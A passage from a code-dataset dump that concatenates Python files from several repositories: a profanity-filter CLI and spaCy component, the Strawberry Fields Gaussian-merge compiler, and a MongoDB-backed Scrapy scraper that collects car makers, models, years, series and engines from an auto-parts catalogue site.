elif len(lines) > truncate:
pre_highlight = "\n".join(lines[-truncate - 1:])
new_doc += pre_highlight + highlighted
current_idx = end_idx
if escape_html:
post_highlight = str(escape(doc[current_idx:]))
else:
post_highlight = doc[current_idx:]
if truncate >= 0:
lines = post_highlight.split("\n")
if len(lines) > truncate:
post_highlight = "\n".join(lines[:truncate])
new_doc += post_highlight
return new_doc, hl_percent
```
|
{
"source": "Jeyhun023/python",
"score": 3
}
|
#### File: python/badwords/console.py
```python
from sys import exit
import argparse
from profanity_filter.profanity_filter import ProfanityFilter
def main():
parser = argparse.ArgumentParser(description='Profanity filter console utility')
group = parser.add_mutually_exclusive_group()
group.add_argument('-t', '--text', dest='text', help='Test the given text for profanity')
group.add_argument('-f', '--file', dest='path', help='Test the given file for profanity')
parser.add_argument('-l', '--languages', dest='languages', default='en',
help='Test for profanity using specified languages (comma separated)')
parser.add_argument('-o', '--output', dest='output_file', help='Write the censored output to a file')
parser.add_argument('--show', action='store_true', help='Print the censored text')
args = parser.parse_args()
if args.text and args.path:
parser.print_help()
exit()
if args.text:
text = args.text
elif args.path:
with open(args.path) as f:
text = ''.join(f.readlines())
else:
text = ''
pf = ProfanityFilter(languages=args.languages.split(','))
censored_text = pf.censor(text)
if args.output_file:
with open(args.output_file, 'w') as f:
f.write(censored_text)
print("Censored text written to output file at: " + args.output_file)
if args.show:
print("Censored text:\n")
print(censored_text)
if args.show or args.output_file:
return
if pf.is_clean(text):
print("This text is clean.")
else:
print("This text is not clean!")
if __name__ == '__main__':
main()
```
#### File: python/badwords/spacy_component.py
```python
from contextlib import suppress
from typing import Union, Optional, Generator, List
import spacy.language
from more_itertools import partitions
from spacy.tokens import Doc, Span, Token
from profanity_filter import spacy_utlis
from profanity_filter.types_ import Language
class SpacyProfanityFilterComponent:
name = 'profanity_filter'
# noinspection PyUnresolvedReferences
def __init__(self, profanity_filter: 'ProfanityFilter', nlp: spacy.language.Language, language: Language = None,
stop_on_first_profane_word: bool = False):
self._language = language
self._nlp = nlp # Used only for tokenization
self._profanity_filter = profanity_filter
self._stop_on_first_profane_word = stop_on_first_profane_word
# noinspection PyProtectedMember
def __call__(self, doc: Doc, language: Language = None, stop_on_first_profane_word: Optional[bool] = None) -> Doc:
self.register_extensions(exist_ok=True)
if language is None:
language = self._language
if stop_on_first_profane_word is None:
stop_on_first_profane_word = self._stop_on_first_profane_word
i = 0
while i < len(doc):
j = i + 1
while (j < len(doc)
and not doc[j - 1].whitespace_ and not doc[j - 1].is_space and not doc[j - 1].is_punct
and not doc[j].is_space and not doc[j].is_punct):
j += 1
span = self._censor_spaceless_span(doc[i:j], language=language)
if stop_on_first_profane_word and span._.is_profane:
break
i += len(span)
return doc
@staticmethod
def register_extensions(exist_ok: bool = False) -> None:
def do() -> None:
Token.set_extension('censored', default=None)
Token.set_extension('is_profane', getter=SpacyProfanityFilterComponent.token_is_profane)
Token.set_extension('original_profane_word', default=None)
Span.set_extension('is_profane', getter=SpacyProfanityFilterComponent.tokens_are_profane)
Doc.set_extension('is_profane', getter=SpacyProfanityFilterComponent.tokens_are_profane)
if exist_ok:
with suppress(ValueError):
do()
else:
do()
@staticmethod
def token_is_profane(token: Token) -> bool:
# noinspection PyProtectedMember
return token._.censored != token.text
@staticmethod
def tokens_are_profane(tokens: Union[Doc, Span]) -> bool:
# noinspection PyProtectedMember
return any(token._.is_profane for token in tokens)
def _span_partitions(self, span: Span) -> Generator[List[Token], None, None]:
if len(span) == 1:
return span[0]
for partition in partitions(span):
yield [spacy_utlis.make_token(nlp=self._nlp, word=''.join(element)) for element in partition]
# noinspection PyProtectedMember
def _censor_spaceless_span(self, span: Span, language: Language) -> Span:
token = spacy_utlis.make_token(nlp=self._nlp, word=str(span) if len(span) > 1 else span[0])
censored_word = self._profanity_filter.censor_word(word=token, language=language)
if censored_word.is_profane:
with span.doc.retokenize() as retokenizer:
retokenizer.merge(span)
token = span[0]
token._.censored = censored_word.censored
token._.original_profane_word = censored_word.original_profane_word
else:
for token in span:
token._.censored = token.text
return span
```
|
{
"source": "JeyKelly/strawberryfields",
"score": 2
}
|
#### File: strawberryfields/compilers/gaussian_merge.py
```python
import strawberryfields.program_utils as pu
from .compiler import Compiler
from .gaussian_unitary import GaussianUnitary
def get_qumodes_operated_upon(op):
"""
Helper function that returns list of integers, which are the qumode indexes that are operated by op.
"""
return [reg.ind for reg in op.reg]
def get_op_name(op):
"""
Helper function that obtains the string name of an operation.
"""
return op.op.__class__.__name__
class GaussianMerge(Compiler):
"""Compiler that merges adjacent Gaussian operations into a single symplectic transformation,
to reduce the depth of non-Gaussian programs.
As a result, the Gaussian operations that this compiler returns are :class:`~.ops.GaussianTransform`,
and :class:`~.ops.Displacement`. Meanwhile, non-Gaussian operations remain unchanged.
**Example:**
Consider the following Strawberry Fields program, compiled using the `'gaussian_merge'` compiler:
.. code-block:: python3
from strawberryfields.ops import Xgate, Zgate, BSgate, Rgate
import strawberryfields as sf
circuit = sf.Program(1)
with circuit.context as q:
Rgate(0.6)|q[0]
Rgate(0.2)|q[0]
Kgate(0.4)|q[0]
Rgate(0.1)|q[0]
Rgate(0.6)|q[0]
Dgate(0.01)|(q[0])
compiled_circuit = circuit.compile(compiler="gaussian_merge")
We can now print the compiled circuit, which has merged adjacent Gaussian
operations into singular :class:`~.GaussianTransform` operations:
>>> compiled_circuit.print()
GaussianTransform([[ 0.6967 -0.7174]
[0.7174 0.6967]]) | (q[0])
Kgate(0.4)|q[0]
GaussianTransform([[ 0.7648 -0.6442]
[0.6442 0.7648]]) | (q[0])
Dgate(0.01, 0) | (q[0])
"""
short_name = "gaussian_merge"
interactive = True
primitives = {
# meta operations
"All",
"_New_modes",
"_Delete",
# state preparations
"Ket",
# measurements
"MeasureFock",
"MeasureHomodyne",
# single mode gates
"Dgate",
"Sgate",
"Rgate",
"Vgate",
"Kgate",
# two mode gates
"MZgate",
"sMZgate",
"BSgate",
"CKgate",
"S2gate",
"Interferometer",
"GaussianTransform",
}
decompositions = {
"GraphEmbed": {},
"BipartiteGraphEmbed": {},
"Gaussian": {},
"Pgate": {},
"CXgate": {},
"CZgate": {},
"Xgate": {},
"Zgate": {},
"Fouriergate": {},
}
prep_states = ["Ket"]
gaussian_ops = [
"Dgate",
"BSgate",
"S2gate",
"Sgate",
"GaussianTransform",
"Rgate",
"Interferometer",
"MZgate",
"sMZgate",
]
def __init__(self):
self.curr_seq = None
self.DAG = None
self.new_DAG = None
def compile(self, seq, registers):
"""Attempt to merge Gaussian operations into Gaussian Transforms in a hybrid program.
Args:
seq (Sequence[Command]): quantum circuit to modify
registers (Sequence[RegRefs]): quantum registers
Returns:
List[Command]: modified circuit
"""
self.curr_seq = seq
while self.merge_a_gaussian_op(registers):
continue
return self.curr_seq
def merge_a_gaussian_op(self, registers):
"""
Main function to merge a gaussian operation with its gaussian neighbours.
If merge is achieved, the method updates self.curr_seq and returns ``True``
else (merge cannot be achieved), the method returns ``False``.
Program Flow:
- For each operation (op) check and obtain Gaussian operations that can be merged
(get_valid_gaussian_merge_ops).
- If the operation has successor gaussian operations that can be merged,
then merge them using gaussian_unitary.py.
- Determine displacement gates, from gaussian unitary merge, and map them to the qumodes acted upon
(add_displacement_gates).
- Attach predecessor operations of the main operation (op) to new Gaussian transform operations.
- Attach successor non Gaussian operations of op to a displacement gate, if present,
or a gaussian transform operation from the merged operations (add_non_gaussian_successor_gates).
- Attach all non-merged predecessor and successor of the merged operations to the new gaussian
transform and displacement gates (add_gaussian_pre_and_succ_gates).
- Remove nodes of operations that were merged in and convert DAG to sequence.
"""
self.DAG = pu.list_to_DAG(self.curr_seq)
for op in list(self.DAG.nodes):
successors = list(self.DAG.successors(op))
predecessors = list(self.DAG.predecessors(op))
# If operation is a Gaussian operation
if get_op_name(op) in self.gaussian_ops:
merged_gaussian_ops = self.get_valid_gaussian_merge_ops(op)
# If there are successor operations that are Gaussian and can be merged
if merged_gaussian_ops:
self.new_DAG = self.DAG.copy()
# Fix order of operations
unified_operations = self.organize_merge_ops([op] + merged_gaussian_ops)
gaussian_transform = GaussianUnitary().compile(unified_operations, registers)
self.new_DAG.add_node(gaussian_transform[0])
# Logic to add displacement gates. Returns a dictionary,
# where the value is a displacement gate added and its key is the qumode its operating upon.
displacement_mapping = self.add_displacement_gates(gaussian_transform)
# If there are predecessors: Attach predecessor edges to new gaussian transform
if predecessors:
self.new_DAG.add_edges_from(
[(pre, gaussian_transform[0]) for pre in predecessors]
)
# Add edges to all successor operations not merged
self.add_non_gaussian_successor_gates(
gaussian_transform, successors, displacement_mapping
)
# Add edges for all successor/predecessor operations of the merged operations
self.add_gaussian_pre_and_succ_gates(
gaussian_transform, merged_gaussian_ops, displacement_mapping
)
self.new_DAG.remove_nodes_from([op] + merged_gaussian_ops)
self.curr_seq = pu.DAG_to_list(self.new_DAG)
return True
return False
def recursive_d_gate_successors(self, gate):
"""
Gets all displacement gates in channel if they follow each other. Returns lists of displacement gates.
"""
d_gates = []
successors = list(self.DAG.successors(gate))
for successor in successors:
if "Dgate" in get_op_name(successor):
d_gates.append(successor)
ret = self.recursive_d_gate_successors(successor)
if ret:
d_gates += ret
return d_gates
def add_non_gaussian_successor_gates(
self, gaussian_transform, successors, displacement_mapping
):
"""
Updates the DAG by adding edges between new gaussian transform and non-gaussian operations
from original operations.
"""
for successor_op in successors:
if get_op_name(successor_op) not in self.gaussian_ops:
# If there are no displacement gates.
# Add edges from it to successor gates if they act upon the same qumodes
if not displacement_mapping:
# Add edge from gaussian transform to successor operation
self.new_DAG.add_edge(gaussian_transform[0], successor_op)
def add_gaussian_pre_and_succ_gates(
self, gaussian_transform, merged_gaussian_ops, displacement_mapping
):
"""
Updated DAG by adding edges between gaussian transform/displacement operations to unmerged gaussian operations.
"""
successor_operations_added = []
for gaussian_op in merged_gaussian_ops:
# Need special logic if there are displacement gates
if displacement_mapping:
for successor_op in self.DAG.successors(gaussian_op):
placed_edge = False
successor_op_qumodes = get_qumodes_operated_upon(successor_op)
for qumode in successor_op_qumodes:
# If displacement gate operates on the same qumodes as the non-gaussian operation then don't
# add an edge. If register operated upon by successor operation has a displacement gate, add edge.
if (
qumode in displacement_mapping
and qumode not in self.non_gaussian_qumodes_dependecy(successor_op)
):
self.new_DAG.add_edge(displacement_mapping[qumode], successor_op)
placed_edge = True
if not placed_edge:
self.new_DAG.add_edge(gaussian_transform[0], successor_op)
successor_operations_added.append(successor_op)
else:
self.new_DAG.add_edges_from(
[(gaussian_transform[-1], post) for post in self.DAG.successors(gaussian_op)]
)
successor_operations_added += self.DAG.successors(gaussian_op)
for gaussian_op in merged_gaussian_ops:
# Append Predecessors to Gaussian Transform
for predecessor in self.DAG.predecessors(gaussian_op):
# Make sure adding the edge wont make a cycle
if predecessor not in successor_operations_added:
self.new_DAG.add_edge(predecessor, gaussian_transform[0])
def add_displacement_gates(self, gaussian_transform):
"""
Adds displacement gates to new DAG and returns dict with the following format:
{1: Dgate|q[1], 2:Dgate|q[2]}
"""
displacement_mapping = {}
# The Gaussian Unitary compiler can return Dgate in two ways. Either there is a Gaussian Transform plus Dgates
# or the only thing returned is a Dgate.
if len(gaussian_transform) > 1 or "Dgate" in get_op_name(gaussian_transform[0]):
for displacement_gate in gaussian_transform[1:]:
self.new_DAG.add_node(displacement_gate)
self.new_DAG.add_edge(gaussian_transform[0], displacement_gate)
displacement_mapping[displacement_gate.reg[0].ind] = displacement_gate
return displacement_mapping
def get_valid_gaussian_merge_ops(self, op):
"""
Obtains the valid gaussian operations that can be merged with op at the current DAG configuration.
"""
merged_gaussian_ops = []
for successor_op in self.DAG.successors(op):
# If successor operation is a Gaussian operation append to list for merging
if get_op_name(successor_op) in self.gaussian_ops:
merged_gaussian_ops.append(successor_op)
# Get displacement operations (recursively) that follow after successor operation
d_gate_successors = self.recursive_d_gate_successors(successor_op)
if d_gate_successors:
merged_gaussian_ops += d_gate_successors
# Add gaussian operations that should be exectued at the same time as op
# E.X Rgate|q[0] Rgate|q[1] -> BS|q[0]q[1]. Adds Rgate|q[1] if Rgate|q[0] is the op.
for gaussian_op in merged_gaussian_ops:
for predecessor in self.DAG.predecessors(gaussian_op):
if predecessor is op:
continue
if (
predecessor not in merged_gaussian_ops
and get_op_name(predecessor) in self.gaussian_ops
):
if self.valid_prepend_op_addition(op, predecessor, merged_gaussian_ops):
merged_gaussian_ops.append(predecessor)
merged_gaussian_ops = self.remove_invalid_operations(op, merged_gaussian_ops)
if self.is_redundant_merge(op, merged_gaussian_ops):
return []
return merged_gaussian_ops
def is_redundant_merge(self, op, merged_gaussian_ops):
"""
Helper function that determines if merge will do nothing. i.e. just contains Gaussian Transforms and
Displacement operations.
"""
if "GaussianTransform" in get_op_name(op):
all_displacement_gates = True
for gate in merged_gaussian_ops:
if "Dgate" not in get_op_name(gate):
all_displacement_gates = False
if all_displacement_gates:
return True
return False
def non_gaussian_qumodes_dependecy(self, op):
"""
Get qumodes used in predecessor non-gaussian operations of op. Returns a list of integers,
where the number depicts the qumode index that the non-Gaussian operation operates on.
"""
for predecessor in self.DAG.predecessors(op):
if not self.is_op_gaussian_or_prep(predecessor):
return get_qumodes_operated_upon(predecessor)
return []
def organize_merge_ops(self, merged_gaussian_ops):
"""
Organize operations to be merged in order by using the order of the current operation sequence.
"""
organized_merge_operations = []
for op_in_seq in self.curr_seq:
if op_in_seq in merged_gaussian_ops:
organized_merge_operations.append(op_in_seq)
return organized_merge_operations
def is_op_gaussian_or_prep(self, op):
"""
Helper function that returns True if op is Gaussian or a preparation state else returns False.
"""
op_name = get_op_name(op)
return op_name in self.gaussian_ops or op_name in self.prep_states
def valid_prepend_op_addition(self, op, pre, merged_gaussian_ops):
"""
Helper function that ensures predecessor operation being added to merger list, did not skip any operations
between op (operation being merged) and pre (predecessor operation of op attempted to be merged).
"""
for pre_op in self.DAG.predecessors(op):
if pre_op not in merged_gaussian_ops:
pre_op_qumode = get_qumodes_operated_upon(pre_op)
if any(qumode in pre_op_qumode for qumode in get_qumodes_operated_upon(pre)):
return False
return True
def remove_invalid_operations(self, op, merged_gaussian_ops):
"""
Helper function that removes operations from merged_gaussian_ops if they are being operated upon a
non-gaussian beforehand.
E.X BS | q[0],q[1] has successors Vgate | q[1] & S2gate q[0],q[1] in this case the S2gate is removed.
"""
op_qumodes = get_qumodes_operated_upon(op)
for gaussian_op in merged_gaussian_ops:
if any(
qumode in op_qumodes for qumode in self.non_gaussian_qumodes_dependecy(gaussian_op)
):
# Cannot merge gaussian ops that are operated upon a non-gaussian gate beforehand
# E.x. BS | q[0],q[1] has successors V | q[1] & S2gate q[1], q[2]
merged_gaussian_ops.remove(gaussian_op)
return merged_gaussian_ops
```
|
{
"source": "JeyKip/autoinfo-scrapper",
"score": 3
}
|
#### File: data/abstraction/model_year_store.py
```python
from abc import ABC, abstractmethod
from autoinfo.data.abstraction import BaseStore
class ModelYearStore(BaseStore, ABC):
@abstractmethod
def find_by_model_id(self, model_id):
raise NotImplementedError
@abstractmethod
def find_by_submodel_id(self, submodel_id):
raise NotImplementedError
@abstractmethod
def find_by_model_id_and_submodel_id(self, model_id, submodel_id):
raise NotImplementedError
```
#### File: data/mongo/mongo_model_cookie_store.py
```python
from mongoengine import Document, StringField
from . import MongoBaseStore
from ..abstraction import ModelCookieStore
from ..plain import ModelCookie
class MongoModelCookie(Document):
maker_name = StringField(required=True)
model_name = StringField(required=True, unique_with="maker_name")
script_version = StringField(required=True)
cookie = StringField(required=True)
meta = {
'db_alias': 'core',
'collection': 'model_cookies'
}
class MongoModelCookieStore(ModelCookieStore, MongoBaseStore):
doc_type = MongoModelCookie
def find_by_model(self, maker_name, model_name):
return self.__find_single(maker_name=maker_name, model_name=model_name)
def get_all(self):
return [self.__create_model(x) for x in self.doc_type.objects]
def find_by_id(self, _id):
return self.__find_single(id=_id)
def __find_single(self, **kwargs):
entity = self.doc_type.objects(**kwargs).first()
model = self.__create_model(entity)
return model
# noinspection PyMethodMayBeStatic
def __create_model(self, entity: MongoModelCookie):
if not entity:
return None
return ModelCookie(entity.id, entity.maker_name, entity.model_name, entity.script_version, entity.cookie)
```
#### File: data/mongo/mongo_model_store.py
```python
from typing import List, Optional
from mongoengine import Document, StringField, IntField, ObjectIdField, BooleanField
from . import MongoBaseStore
from ..abstraction import ModelStore
from ..plain import Model
class MongoModel(Document):
maker_id = ObjectIdField(required=True)
code = StringField(required=True)
name = StringField(required=True, unique_with="maker_id")
script_version = StringField(required=True)
cookie = StringField(required=True)
submodels_handled = BooleanField(required=True, default=False)
submodels_count = IntField(required=True, default=0)
years_handled = BooleanField(required=True, default=False)
meta = {
'db_alias': 'core',
'collection': 'models',
'ordering': ['name']
}
class MongoModelStore(ModelStore, MongoBaseStore):
doc_type = MongoModel
def get_all(self) -> List[Model]:
return [self.__create_model(x) for x in self.doc_type.objects]
def find_by_id(self, _id) -> Optional[Model]:
entity = self.doc_type.objects(id=_id).first()
model = self.__create_model(entity)
return model
def find_by_maker_id(self, maker_id) -> List[Model]:
return [self.__create_model(x) for x in self.doc_type.objects(maker_id=maker_id)]
def turn_on_years_handled_flag(self, model_id):
self.doc_type.objects(id=model_id).update_one(set__years_handled=True)
# noinspection PyMethodMayBeStatic
def __create_model(self, entity: MongoModel):
if not entity:
return None
return Model(
_id=entity.id, maker_id=entity.maker_id, model_code=entity.code, model_name=entity.name,
script_version=entity.script_version, cookie=entity.cookie, submodels_handled=entity.submodels_handled,
submodels_count=entity.submodels_count, years_handled=entity.years_handled
)
```
#### File: data/plain/entity.py
```python
class Entity:
def __init__(self, _id=None):
self.id = _id
```
#### File: autoinfo/decoders/request_decoder.py
```python
from .constants import HEX_SUBSTITUTION_SYMBOLS, ZERO_ASCII_CODE
from .hex_decoder import HexDecoder
# noinspection PyMethodMayBeStatic
class RequestDecoder:
def __init__(self):
self.__hex_decoder = HexDecoder()
def decode(self, value):
original_hex_query = self.__replace_substitutions_with_original_symbols(value)
original_query = self.__hex_decoder.from_hex_to_string(original_hex_query)
return original_query
def __replace_substitutions_with_original_symbols(self, value):
result = []
for i in range(len(value) - 1, -1, -1):
index_in_substitutions = HEX_SUBSTITUTION_SYMBOLS.index(value[i])
symbol_ascii_code = index_in_substitutions + ZERO_ASCII_CODE
original_symbol = chr(symbol_ascii_code)
result.append(original_symbol)
return "".join(result)
```
#### File: autoinfo/services/auto_details_service.py
```python
from collections import defaultdict
from typing import List, Dict
from autoinfo.data.abstraction import MakerStore, ModelStore, SubModelStore, ModelCookieStore, ModelYearStore, \
SeriesStore, ModelSeriesStore, EngineStore, ModelEngineStore
from autoinfo.data.plain import Maker, Entity, Model, SubModel, ModelCookie, ModelYear, Series, ModelSeries, Engine, \
ModelEngine
from autoinfo.decoders import HexDecoder
class AutoDetailsService:
def __init__(self, maker_store: MakerStore, models_store: ModelStore, submodel_store: SubModelStore,
model_cookie_store: ModelCookieStore, model_year_store: ModelYearStore, series_store: SeriesStore,
model_series_store: ModelSeriesStore, engine_store: EngineStore, model_engine_store: ModelEngineStore):
self.__maker_store = maker_store
self.__models_store = models_store
self.__submodel_store = submodel_store
self.__model_cookie_store = model_cookie_store
self.__model_year_store = model_year_store
self.__series_store = series_store
self.__model_series_store = model_series_store
self.__engine_store = engine_store
self.__model_engine_store = model_engine_store
self.__hex_decoder = HexDecoder()
def save_makers(self, makers: List[Maker]):
existing_makers = self.__maker_store.get_all()
makers_to_save = self.__filter_entities_to_save(existing_makers, makers, lambda maker: maker.name)
self.__maker_store.save(makers_to_save)
def load_makers(self) -> List[Maker]:
return self.__maker_store.get_all()
def load_makers_dict(self) -> Dict[str, Maker]:
return {maker.id: maker for maker in self.load_makers()}
def save_models(self, maker_name: str, models: List[Model]):
maker = self.__maker_store.find_by_name(maker_name)
existing_models = self.__models_store.find_by_maker_id(maker.id)
models = models or []
for model in models:
model.maker_id = maker.id
models_to_save = self.__filter_entities_to_save(existing_models, models,
lambda entity: (entity.maker_id, entity.name))
new_models_count = len(list(filter(lambda item: not item.id, models_to_save)))
if models_to_save:
self.__models_store.save(models_to_save)
if new_models_count:
self.__maker_store.change_handled_models_count(maker.id, new_models_count)
def load_models(self) -> List[Model]:
return self.__models_store.get_all()
def load_models_for_maker(self, maker_id):
return self.__models_store.find_by_maker_id(maker_id)
def load_models_dict(self) -> Dict[str, Model]:
return {model.id: model for model in self.load_models()}
def save_submodels(self, model_id: str, submodels: List[SubModel]):
model = self.__models_store.find_by_id(model_id)
existing_submodels = self.__submodel_store.find_by_model_id(model_id)
submodels = submodels or []
for sm in submodels:
sm.model_id = model_id
submodels_to_save = self.__filter_entities_to_save(existing_submodels, submodels,
lambda entity: (entity.model_id, entity.name))
model.submodels_handled = True
model.submodels_count = len(submodels_to_save)
self.__submodel_store.save(submodels_to_save)
self.__models_store.save(model)
def load_submodels(self) -> List[SubModel]:
return self.__submodel_store.get_all()
def load_submodels_dict(self) -> Dict[str, SubModel]:
return {sub.id: sub for sub in self.__submodel_store.get_all()}
def load_submodels_by_model_id_dict(self) -> Dict[str, List[SubModel]]:
result = defaultdict(list)
for sub in self.load_submodels():
result[sub.model_id].append(sub)
return result
def get_submodel_properties_or_default(self, submodel: SubModel = None):
if submodel:
return submodel.id, submodel.code
else:
return None, self.__hex_decoder.convert_to_hex_string("ALL")
def save_years(self, model_id: str, submodel_id: str, years: List[int]):
if not model_id:
raise ValueError("model_id is required parameter for save_years method.")
existing_model_years = self.load_years_for_model(model_id, submodel_id)
model_years = [ModelYear(model_id=model_id, submodel_id=submodel_id, year=year) for year in years or []]
model_years_to_save = self.__filter_entities_to_save(
existing_model_years, model_years,
lambda entity: (entity.model_id, entity.submodel_id, entity.year)
)
if model_years_to_save:
self.__model_year_store.save(model_years_to_save)
if submodel_id:
self.__submodel_store.turn_on_years_handled_flag(submodel_id)
else:
self.__models_store.turn_on_years_handled_flag(model_id)
def save_model_cookie(self, maker_name, model_name, script_version, cookie):
existing_cookie = self.__model_cookie_store.find_by_model(maker_name, model_name)
if existing_cookie:
existing_cookie.script_version = script_version
existing_cookie.cookie = cookie
self.__model_cookie_store.save(existing_cookie)
else:
self.__model_cookie_store.save(ModelCookie(
maker_name=maker_name, model_name=model_name,
script_version=script_version, cookie=cookie
))
def get_cookie_for_model(self, maker_name, model_name) -> ModelCookie:
return self.__model_cookie_store.find_by_model(maker_name, model_name)
def set_maker_models_count(self, maker_id, models_count):
self.__maker_store.set_models_count(maker_id, models_count)
def load_years(self) -> List[ModelYear]:
return self.__model_year_store.get_all()
def load_years_for_model(self, model_id, submodel_id):
if not model_id:
raise ValueError("model_id is required parameter.")
if not submodel_id:
return self.__model_year_store.find_by_model_id(model_id)
else:
return self.__model_year_store.find_by_model_id_and_submodel_id(model_id, submodel_id)
def save_series(self, model_id, submodel_id, year_id, series_list: List[Series]):
if not model_id:
raise ValueError("model_id is required parameter.")
if not year_id:
raise ValueError("year_id is required parameter.")
self.__save_series(series_list)
self.__save_model_series(model_id, submodel_id, year_id, series_list)
def __save_series(self, series_list: List[Series]):
series_to_save = [item for item in series_list if
not self.__series_store.find_by_series_and_chassis(item.series, item.chassis)]
if series_to_save:
self.__series_store.save(series_to_save)
def __save_model_series(self, model_id, submodel_id, year_id, series_list: List[Series]):
model_year = self.__model_year_store.find_by_id(year_id)
model_series_to_save = []
for series in series_list:
series_entity = self.__series_store.find_by_series_and_chassis(series.series, series.chassis)
model_series_entity = self.__model_series_store.find_by_unique_key(model_id, submodel_id, series_entity.id,
model_year.year)
if not model_series_entity:
model_series = ModelSeries(model_id=model_id, submodel_id=submodel_id, series_id=series_entity.id,
year=model_year.year)
model_series_to_save.append(model_series)
if model_series_to_save:
self.__model_series_store.save(model_series_to_save)
model_year.series_handled = True
self.__model_year_store.save(model_year)
def load_series(self) -> List[Series]:
return self.__series_store.get_all()
def load_series_dict(self) -> Dict[str, Series]:
return {item.id: item for item in self.load_series()}
def load_model_series(self) -> List[ModelSeries]:
return self.__model_series_store.get_all()
def save_engines(self, model_id, submodel_id, year, model_series_id, engines_list: List[Engine]):
if not model_id:
raise ValueError("model_id is required parameter.")
if not year:
raise ValueError("year is required parameter.")
if not model_series_id:
raise ValueError("series_id is required parameter.")
self.__save_engines(engines_list)
self.__save_model_engines(model_id, submodel_id, year, model_series_id, engines_list)
def __save_engines(self, engines_list: List[Engine]):
engines_to_save = [item for item in engines_list if
not self.__engine_store.find_by_unique_key(item.code, item.name)]
if engines_to_save:
self.__engine_store.save(engines_to_save)
def __save_model_engines(self, model_id, submodel_id, year, model_series_id, engines_list: List[Engine]):
model_series = self.__model_series_store.find_by_id(model_series_id)
model_engines_to_save = []
for engine in engines_list:
engine_entity = self.__engine_store.find_by_unique_key(engine.code, engine.name)
model_engine_entity = self.__model_engine_store.find_by_unique_key(
model_id, submodel_id, model_series.series_id, engine_entity.id, year
)
if not model_engine_entity:
model_engine = ModelEngine(
model_id=model_id, submodel_id=submodel_id, series_id=model_series.series_id,
engine_id=engine_entity.id, year=year
)
model_engines_to_save.append(model_engine)
if model_engines_to_save:
self.__model_engine_store.save(model_engines_to_save)
model_series.engines_handled = True
self.__model_series_store.save(model_series)
# noinspection PyMethodMayBeStatic
def __filter_entities_to_save(self, existing_entities: List[Entity], entities_to_save: List[Entity],
unique_key_supplier):
if not unique_key_supplier or not callable(unique_key_supplier):
raise ValueError("unique_key_supplier is required and should be a callable object.")
existing_entities = existing_entities or []
entities_to_save = entities_to_save or []
existing_entities_by_id_dict = {}
existing_entities_by_unique_key_dict = {}
for entity in existing_entities:
existing_entities_by_id_dict[entity.id] = entity
existing_entities_by_unique_key_dict[unique_key_supplier(entity)] = entity
filtered_entities = []
for entity in entities_to_save:
key = unique_key_supplier(entity)
if entity.id:
if entity.id in existing_entities_by_id_dict:
if key not in existing_entities_by_unique_key_dict:
filtered_entities.append(entity)
else:
existing_entity = existing_entities_by_unique_key_dict[key]
if existing_entity.id == entity.id:
filtered_entities.append(entity)
elif key not in existing_entities_by_unique_key_dict:
filtered_entities.append(entity)
return filtered_entities
```
#### File: src/autoinfo/utils.py
```python
import traceback
def get_value_safely(key, dictionary, value_type=str):
try:
if key in dictionary:
return value_type(dictionary[key])
return None
except Exception as error:
traceback.print_tb(error.__traceback__)
return None
```
#### File: autoinfo-scrapper/src/main.py
```python
import os
from dotenv import dotenv_values
from scrapy.crawler import CrawlerProcess
from scrapy.utils.project import get_project_settings
from twisted.internet.defer import inlineCallbacks
from autoinfo.cookie import CookieProvider
from autoinfo.data.mongo import MongoConnector, MongoConnectionSettings, MongoMakerStore, MongoModelStore, \
MongoSubModelStore, MongoModelCookieStore, MongoModelYearStore, MongoSeriesStore, MongoModelSeriesStore, \
MongoEngineStore, MongoModelEngineStore
from autoinfo.services import AutoDetailsService
from autoinfo.utils import get_value_safely
from scrapper.scrapper.spiders import AutoInfoSeriesSpider, AutoInfoMakersSpider, AutoInfoModelsSpider, \
AutoInfoSubModelsSpider, AutoInfoYearsSpider, AutoInfoEnginesSpider
def start_scrapping():
with MongoConnector() as connector:
config = dotenv_values(".env")
settings = [
MongoConnectionSettings(
get_value_safely("MONGO_CONNECTION_ALIAS", config),
get_value_safely("MONGO_DATABASE", config),
get_value_safely("MONGO_AUTH_USERNAME", config),
get_value_safely("MONGO_AUTH_PASSWORD", config),
get_value_safely("MONGO_HOST", config),
get_value_safely("MONGO_PORT", config, int),
get_value_safely("MONGO_AUTH_DATABASE", config)
)
]
connector.create_connections(settings)
# create concrete stores
maker_store = MongoMakerStore()
models_store = MongoModelStore()
submodels_store = MongoSubModelStore()
model_cookies_store = MongoModelCookieStore()
model_years_store = MongoModelYearStore()
series_store = MongoSeriesStore()
model_series_store = MongoModelSeriesStore()
engine_store = MongoEngineStore()
model_engine_store = MongoModelEngineStore()
# create services
auto_details_service = AutoDetailsService(maker_store, models_store, submodels_store, model_cookies_store,
model_years_store, series_store, model_series_store, engine_store,
model_engine_store)
# create utils classes
cookie_provider = CookieProvider()
process = create_crawler_process(auto_details_service)
# We should run all these spiders consequently because:
# 1) Each of them depends on the results of running previous one
# 2) It also gives us flexibility to run only some particular spiders to crawl only required information.
# Since lists of makers, models and years are changed rarely we don't need to load them every time
# we run this scrapper. So we can make some sort of tasks which can be stored in a database and run spiders
# based on them. Or we just can comment out some of them at some time and run only required one to update
# only information which we need to update right now.
@inlineCallbacks
def run_spiders():
base_api_url = "https://online.autoinfo.com.au/oscar/Aut01nf0iiqq4/a"
yield process.crawl(AutoInfoMakersSpider, auto_details_service, cookie_provider, base_api_url)
yield process.crawl(AutoInfoModelsSpider, auto_details_service, cookie_provider, base_api_url)
yield process.crawl(AutoInfoSubModelsSpider, auto_details_service, base_api_url)
yield process.crawl(AutoInfoYearsSpider, auto_details_service, base_api_url)
yield process.crawl(AutoInfoSeriesSpider, auto_details_service, base_api_url)
yield process.crawl(AutoInfoEnginesSpider, auto_details_service, base_api_url)
run_spiders()
process.start()
def create_crawler_process(auto_details_service):
# we need to specify a custom module name where to take overridden settings from
os.environ.setdefault('SCRAPY_SETTINGS_MODULE', "scrapper.scrapper.settings")
settings = get_project_settings()
# we need to extend settings with passing custom objects to be able to inject them into pipelines
settings.set("AUTO_DETAILS_SERVICE", auto_details_service)
process = CrawlerProcess(settings)
return process
if __name__ == "__main__":
start_scrapping()
```
#### File: scrapper/pipelines/save_item_to_database.py
```python
from autoinfo.services import AutoDetailsService
from scrapper.scrapper.items import MakersListItem, ModelsListItem, SubModelsListItem, YearsListItem, \
MakerModelsCountItem, SeriesListItem, EnginesListItem
class SaveItemToDatabasePipeline:
def __init__(self, auto_details_service: AutoDetailsService):
self.__auto_details_service = auto_details_service
self.__handlers = {
MakersListItem.__name__: self.__handle_makers_list_item,
ModelsListItem.__name__: self.__handle_models_list_item,
